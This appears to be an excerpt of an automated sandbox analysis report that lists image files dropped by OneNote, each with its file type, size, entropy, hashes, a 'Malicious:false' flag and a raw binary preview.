                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                        SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22203
                                                                                                        Entropy (8bit):6.977175130747846
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
                                                                                                        MD5:2D3128554F6286809B2C8E99DE5FD3F6
                                                                                                        SHA1:FC42CB04151D36F448093BDEFE33031A9B8D797D
                                                                                                        SHA-256:14FA2D16310485AA1CE41F6D774A3D637E8CF8B03C4F72990155DF274FDB6BD9
                                                                                                        SHA-512:D8531247A6E89ECABEA9C4A78F596CCE3493334EDF71AE4F7998FDDD0F80705948609C89756AB56FDFAB6D04DEC5F699A693801A772CA2EE2465BDD2CE5D2D5A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....XExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:06:24............................&.........................................................(.....................&...........*.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...H.....Go.Kxn.b..g...........%?_....O......q......7G......%%.V..8zm.].v?...jJ~._..>.......O;........o..rI.A.....n.a.........
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4081
                                                                                                        Entropy (8bit):7.943373267196131
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                        MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                        SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                        SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                        SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4847
                                                                                                        Entropy (8bit):7.950192613458318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                        MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                        SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                        SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                        SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12824
                                                                                                        Entropy (8bit):7.974776104184905
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                        MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                        SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                        SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                        SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.943341403425058
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                        MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                        SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                        SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                        SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65998
                                                                                                        Entropy (8bit):7.671031449942883
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                        MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                        SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                        SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                        SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2332
                                                                                                        Entropy (8bit):7.8822150338370776
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                        MD5:91CB7F1273AA003076401081B8A22237
                                                                                                        SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                        SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                        SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 814x105, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):12654
                                                                                                        Entropy (8bit):7.745439197485533
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:JheN2cq6MLu6MLGu54cHeNzhcmhcDu53eNE3UPkhrxvu:Ji2Wix7fzVsbE3Zm
                                                                                                        MD5:4BCCCDBB4273ECEBE216C84930A8D0B2
                                                                                                        SHA1:FFBF617787E27BC94D9BAF89F2FE34A2BD42794B
                                                                                                        SHA-256:474F9A8C25D5E21192315397EA995B1E11E2C1608157C6E0277688091BFD136A
                                                                                                        SHA-512:DAD73A8C0E293B88685C0C71EF15E0DC95EE39B7FC9F849DE5D634173FD9FA0AF0AA96742D9E94BE03556AA4A817D5001C95A6736EAD5D5DF03661876785EB74
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................i..............................................E.....................U....V...f..ASTc.......de.1Qq...!Rb....Ca."r.................................B....................b....Ra.....!Qc.....AS.1U.."C...2Bq...$#3%&.............?......3.....~......:..g..s"......:..g..s"..ic..Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. :..f..h.....Vk.f.. ..0...Q_..X..V5E~..c..X...@u...cTW...0...Q_..;.m.....@w...Q.+....*.4W...lUFh....v..._..wn...dW....y._..v..E~...*...@wn...dW....y._...v..U..@wn...d..{`;.|U.2g...*.3...:.0?ViN.z.@w...4.M.:m..`~..i7...q...I....J.`l...W..n..PQTiB...6....+..sj.*."...6....+..WA...x..A........(.N6`..AD.q.....'S...t.Q:.l.......f.]..N..0.. .u8..A........_W..Y...}.C...~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~....&.E~.v..?U..^.r..}..Bep
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 177 x 123, 8-bit/color RGBA, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65589
                                                                                                        Entropy (8bit):7.960181939300061
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:2Hlrjw3xL//DPgff+9j6yPWvHMHjkbfnwHO3AW3GL:2H2zDUU+yPVHITwNfL
                                                                                                        MD5:8B48DA9F89264D14B83FF9969F869577
                                                                                                        SHA1:E1BD58E2D80FEEF56DC514F3F0B3AB9669F22F95
                                                                                                        SHA-256:62AD3C277E54F03F1ADB44062407346F789E63859B7AFABFD64BE6AF5E9F66EC
                                                                                                        SHA-512:03B783EC968DF3F648504D068D64DD1AE110E28110FE5B3401C9D04F44897DBE0CBB5680D42CA4C665FA94A6CED4B559106EB3C06C9BF2C5B14951ECBFFAC8AE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......{.....;Za.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Macromedia Fireworks 8.h.x....tEXtCreation Time.05/15/06.8.p....prVWx..Y=.+I....t.y...,^vv....;. "|. .i7.....$.2g..']pH@p..]b....H.H.......d'@ B...U.xm..3{3k?..5n.._}U...3......~..>...g.....f..t...t:...p>..Si..d:..k:.Lf..t6.K.i....d<...x.8\.8.+lc...)i.$.r.....x.t.BG.R.cm.c...p.:&.6.4..K.......^...~b].0....oBYv..u.'.=.K.Q.g)6.....4.!.M......4.=....G.%.Sr........nxC.F..t.U........1...J.t..eQ....".... |...81.$D.!.>...........$...^.vY..EY8tb..'.P.g#O....S*..0'.V....x.W..........k.......s.C.S...J%.iVb..].........3....j.}*.z....+.s..@..K.....\x.C..e.Qq.....;N.....;....,....^.*..$F..{G...8.#....8'..&....8..5.....3(P._....S......|".....u.cr....+a-....&V..x...iI-<|a.{E.c.X.......?..&.C....'........(.x....>...M.?.9..#X......l...0...Z.F..<.z.0}Q..Z1..........?h..`E$K.2o.A*c^.......*..D..uL=.}.#*0.. M!.A.C......|_..(.Y........!E... .O...`;....M+..x.u~g...q>...N."D^..K..x..D.`.!.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 77 x 627, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5136
                                                                                                        Entropy (8bit):7.622045262603241
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
                                                                                                        MD5:FA38AFA965141EA3F17863EE8DCCDE61
                                                                                                        SHA1:2B4611E651AF7549C1AA73932B1136B561A7602F
                                                                                                        SHA-256:E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
                                                                                                        SHA-512:A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):136726
                                                                                                        Entropy (8bit):7.973487854173386
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                        MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                        SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                        SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                        SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2599
                                                                                                        Entropy (8bit):7.903700862190034
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                        MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                        SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                        SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                        SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                        Malicious:false
